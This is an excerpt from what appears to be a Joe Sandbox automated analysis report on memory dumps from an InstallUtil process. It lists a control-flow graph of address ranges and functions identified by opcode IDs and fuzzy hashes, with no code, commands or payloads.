                                                              control_flow_graph 1929 67704f4-6770509 1932 677050f-6770513 1929->1932 1933 67709c8-67709f7 1929->1933 1934 6770a34-6770cf9 1932->1934 1935 6770519-6770523 1932->1935 1936 67709fe-6770a2d 1933->1936 1935->1936 1937 6770529-6770557 1935->1937 1936->1934 1948 67700ab-67700b8 1937->1948 1952 6770734-677073d 1948->1952 1953 67700be-67700d5 1948->1953 1953->1948 1956 67700d7 1953->1956 1958 6770144-67701a7 1956->1958 1959 6770384-67703a7 1956->1959 1960 6770222-6770250 1956->1960 1961 6770470-677049e 1956->1961 1962 67700de 1956->1962 1963 677030e-6770331 1956->1963 1964 67701ac-67701cf 1956->1964 1965 67703fa-6770428 1956->1965 1966 6770298-67702bb 1956->1966 1958->1948 2007 6770926-6770955 1959->2007 2008 67703ad-67703b1 1959->2008 1989 6770252-6770258 1960->1989 1990 6770268-6770293 1960->1990 1991 67704b6-67704e1 1961->1991 1992 67704a0-67704a6 1961->1992 1969 67700e8-6770104 1962->1969 2015 6770337-677033b 1963->2015 2016 6770884-67708b3 1963->2016 2011 67701d5-67701d9 1964->2011 2012 6770740-677076f 1964->2012 1987 6770440-677046b 1965->1987 1988 677042a-6770430 1965->1988 2009 67707e2-6770811 1966->2009 2010 67702c1-67702c5 1966->2010 1981 677010a-677013f 1969->1981 1981->1948 1987->1948 1998 6770434-6770436 1988->1998 1999 6770432 1988->1999 2002 677025c-677025e 1989->2002 2003 677025a 1989->2003 1990->1948 1991->1948 2004 67704aa-67704ac 1992->2004 2005 67704a8 1992->2005 1998->1987 1999->1987 2002->1990 2003->1990 2004->1991 2005->1991 2032 677095c-677098b 2007->2032 2019 67703b7-67703c1 2008->2019 2020 6770992-67709c1 2008->2020 2034 6770818-6770847 2009->2034 2021 677084e-677087d 2010->2021 2022 67702cb-67702d5 2010->2022 2023 67701df-67701e9 2011->2023 2024 67707ac-67707db 2011->2024 2036 6770776-67707a5 2012->2036 2025 6770341-677034b 2015->2025 2026 67708f0-677091f 2015->2026 2042 67708ba-67708e9 2016->2042 2031 67703c7-67703f5 2019->2031 2019->2032 2020->1933 2021->2016 2033 67702db-6770309 2022->2033 2022->2034 2023->2036 2037 67701ef-677021d 2023->2037 2024->2009 2041 6770351-677037f 2025->2041 2025->2042 2026->2007 2031->1948 2032->2020 2033->1948 2034->2021 2036->2024 2037->1948 2041->1948 2042->2026
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66e924e74e6faba71d5af3baa97db307d1ab4891e1ac0abb96215fc73576507b
                                                              • Instruction ID: 0b0bfeff5e4a232bf46f5bac9d695001545df1fc81bf9836b3f398482f5adde0
                                                              • Opcode Fuzzy Hash: 66e924e74e6faba71d5af3baa97db307d1ab4891e1ac0abb96215fc73576507b
                                                              • Instruction Fuzzy Hash: A91298707406158FCB55DF68D840A6EBBB6FF85710F008968D5029F3A5CBBAED098B92
                                                              Function 0677056A Relevance: .5, Instructions: 464COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66e600dd1141314a45f83f3710c184199b9470f05efcd5ef4609baa75ebd5078
                                                              • Instruction ID: 61ec1fffd948d9f34fddf6bfbcb97901eb33d30fb21bbd8d4960302752a884cb
                                                              • Opcode Fuzzy Hash: 66e600dd1141314a45f83f3710c184199b9470f05efcd5ef4609baa75ebd5078
                                                              • Instruction Fuzzy Hash: 9D0299707006158FDB55DF68D840A6EBBB6FF85710F008968D5029F3A5CBBAED09CB92
                                                              Function 067705E0 Relevance: .4, Instructions: 427COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 550cc45a825e40a6aba9beb47f2ece88ed1c781fc4f11cf00bbc39f4f030e96e
                                                              • Instruction ID: 015612f17ead7247b5f070d9561414d2bfc5e2c8fdd3a35753186a0a9e8acb4f
                                                              • Opcode Fuzzy Hash: 550cc45a825e40a6aba9beb47f2ece88ed1c781fc4f11cf00bbc39f4f030e96e
                                                              • Instruction Fuzzy Hash: 09028870B006158FDB54CF68D841A6EBBB6FF85710F008959D5029F3A5CBBAED09CB92
                                                              Function 06770656 Relevance: .4, Instructions: 389COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7099ae7ea09f709b830216cc973dff8d94c68ceb00305f9daab6ed1a05ef565b
                                                              • Instruction ID: 1d1262da127e779f4c0528976607e2e36d80b748918ca10acd882d627afe190f
                                                              • Opcode Fuzzy Hash: 7099ae7ea09f709b830216cc973dff8d94c68ceb00305f9daab6ed1a05ef565b
                                                              • Instruction Fuzzy Hash: 94F189B0B006149FDF44CF68D845A6EBBB6FF85700F008559E5029F3A5CBB6E909CB92
                                                              Function 067706CC Relevance: .4, Instructions: 355COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc7c7646668f48fbef9323f1c46597a232f5a11e0dd8e2df94533df1749bbdc2
                                                              • Instruction ID: 5059474b9072ccd9011bc6b28d6e511a217ecf08a4e7178a95c533197a3dc2d2
                                                              • Opcode Fuzzy Hash: dc7c7646668f48fbef9323f1c46597a232f5a11e0dd8e2df94533df1749bbdc2
                                                              • Instruction Fuzzy Hash: 6DE18BB0B006049FDF40CF68D995A6EBBB6FF85700F108459E5029F3A5CBB6E905CBA1
                                                              Function 06770009 Relevance: .3, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d083f316fdde3d5fbd6ac1778fda916d4d11dbe8feb6a572de52f4c5e45f414
                                                              • Instruction ID: c68aae73256c4d29aa46b2c9c0f9206e03ffd4eef9e20572c6ae4a705b974a80
                                                              • Opcode Fuzzy Hash: 9d083f316fdde3d5fbd6ac1778fda916d4d11dbe8feb6a572de52f4c5e45f414
                                                              • Instruction Fuzzy Hash: 38D1AFB0B10204DFEF418F64C955A6ABBB6FF89700F14849AE5029F3A5CBB5DD05CBA1
                                                              Function 06771536 Relevance: .3, Instructions: 327COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f19155ae7984a3b9dbb3de9578f4a008fb78d1a43b87e2210c5723a53cd51a5b
                                                              • Instruction ID: a2cab47cff695d41de63f42c06e8c7648dd88c4763c16b015466851351590591
                                                              • Opcode Fuzzy Hash: f19155ae7984a3b9dbb3de9578f4a008fb78d1a43b87e2210c5723a53cd51a5b
                                                              • Instruction Fuzzy Hash: 50C12A34B20104AFCB04DF98D986EADBBB6FF89700F508459EA459F761C672ED06CB61
                                                              Function 06773138 Relevance: .2, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2bdf80e954652b8f357a2a634eff14671b2a7a0897c3e67250fd6209158ddef
                                                              • Instruction ID: cb26848bcb52ae5fb24f7bc4436b91fd5862cb40e2aa079d70ae220a995ac100
                                                              • Opcode Fuzzy Hash: e2bdf80e954652b8f357a2a634eff14671b2a7a0897c3e67250fd6209158ddef
                                                              • Instruction Fuzzy Hash: 2C915D35B102049FCB44DF68C984DAEFBB6FF89710B1580AAE945AB361DB71EC05CB61
                                                              Function 06771308 Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79c81ad839e6273a0caebd150fed7084451877c141261e40180c9068eacf0c47
                                                              • Instruction ID: a39dce34faf34965995742bed7dee8dbdb2984043c47ec349a5105c9f9232c69
                                                              • Opcode Fuzzy Hash: 79c81ad839e6273a0caebd150fed7084451877c141261e40180c9068eacf0c47
                                                              • Instruction Fuzzy Hash: F0512132B003058FCF54AF7DD98047ABBFAAFC2215B9C857AD9859B650EB31C845C7A1
                                                              Function 0156D054 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386484050.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0956beb8aaae6610c5db58e66ef6007a2b95d211c00c3f1930117bd14934b0d8
                                                              • Instruction ID: 611a80221752fb836c1718b309ae597f7598aeec3fa3f2dbceebe32d57d85cf1
                                                              • Opcode Fuzzy Hash: 0956beb8aaae6610c5db58e66ef6007a2b95d211c00c3f1930117bd14934b0d8
                                                              • Instruction Fuzzy Hash: 0721E571604240DFCB159F54D9C0B1ABFB9FB88314F24C969E9490F256C37AD416CBA1
                                                              Function 0156D5CC Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386484050.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb141a16562cf358017cc852c1dd1d60c0c3418fe9caa5e7521f309f904a0085
                                                              • Instruction ID: 558ce69da46a8842ec558ec79c1e2b851940d94b091a85e65d9415d88e0ef440
                                                              • Opcode Fuzzy Hash: eb141a16562cf358017cc852c1dd1d60c0c3418fe9caa5e7521f309f904a0085
                                                              • Instruction Fuzzy Hash: E22136B1200204DFDB05DF58D9C0F1ABFB9FB98314F208969E9490F256C33AD856C6E1
                                                              Function 0157D2F4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386514639.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_157d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbcf3b3c101e8adc5e3f280fe7328e288732adea6d2dcc11687bba13e416f3a9
                                                              • Instruction ID: 4c058fdce7593ea2eeb64ef4b2508cf65cdef37014d2b3b0c4a6c6a97b83299c
                                                              • Opcode Fuzzy Hash: bbcf3b3c101e8adc5e3f280fe7328e288732adea6d2dcc11687bba13e416f3a9
                                                              • Instruction Fuzzy Hash: A7212671604204DFDB01DF58E5C1B2ABFB5FF84324F24C969D8094F246C33AD406CAA1
                                                              Function 0157D4A4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386514639.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_157d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4d8e3ae411326c109e493b1e1d4291bcde2d6174cb16b89c70d3406cb04ddb0
                                                              • Instruction ID: 8ca40315ead36f633f281ad050c6c6fdfe0655a79a248b1ba49daa6b3b64e51b
                                                              • Opcode Fuzzy Hash: a4d8e3ae411326c109e493b1e1d4291bcde2d6174cb16b89c70d3406cb04ddb0
                                                              • Instruction Fuzzy Hash: 7521D0B15042049FDB05CF68E5C5F2ABBB6FF88318F24C969D94A4F252C37AD406CA62
                                                              Function 0156D04F Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386484050.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                              • Instruction ID: 6017cead7155a8d6bfa8d399f22fbc6ffae11f1d849a1d18fbb7be4a212016c9
                                                              • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                              • Instruction Fuzzy Hash: F921CD72504280DFCB16CF44D9C4B1ABF72FB88314F2486A9D9880F257C33AD426CBA2
                                                              Function 0156D5C7 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386484050.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: 3d05e44d55e8a144077d5f0d653ae81910b7114cb7a182566c07959896b099e2
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: A511CD72504244CFCB02CF54D5C4B1ABF72FB88210F248AA9D9490F256C33AD85ACBA2
                                                              Function 0157D49F Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386514639.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_157d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: de6fc092d81a6cb2356a260a454bc2e32a9ca301b219fb1344e9885c37b1e3fb
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 5A11BE75504240CFDB02CF58D5C4B19BF72FB84318F24C6A9D9494F252C33AD40ACB62
                                                              Function 0157D2EF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386514639.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_157d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                              • Instruction ID: cf72c3707eaea8353c2beaa9fcd6ed88a00dca9a9e0033091c320c27d4f241e1
                                                              • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                              • Instruction Fuzzy Hash: EA119D76504284CFDB12CF54E5C4B19BF71FB84324F28C6AAD8494B656C33AD40ACBA2

                                                              Non-executed Functions

                                                              Function 06770D50 Relevance: 10.3, Strings: 8, Instructions: 295COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                              • API String ID: 0-1273862796
                                                              • Opcode ID: 998f920b6467284bfd1d1fe98a088230cf0fb9ad6b2886b621e862c907ee4f36
                                                              • Instruction ID: 82c9a480b486d5f48043cf8126b34c7992317a7aa722cd688b59180f13b1fe57
                                                              • Opcode Fuzzy Hash: 998f920b6467284bfd1d1fe98a088230cf0fb9ad6b2886b621e862c907ee4f36
                                                              • Instruction Fuzzy Hash: 0FB1CD70B002498FDF99DB69C9549BEBBF6BF89310B18846AE406D73A1CB74DC01CB91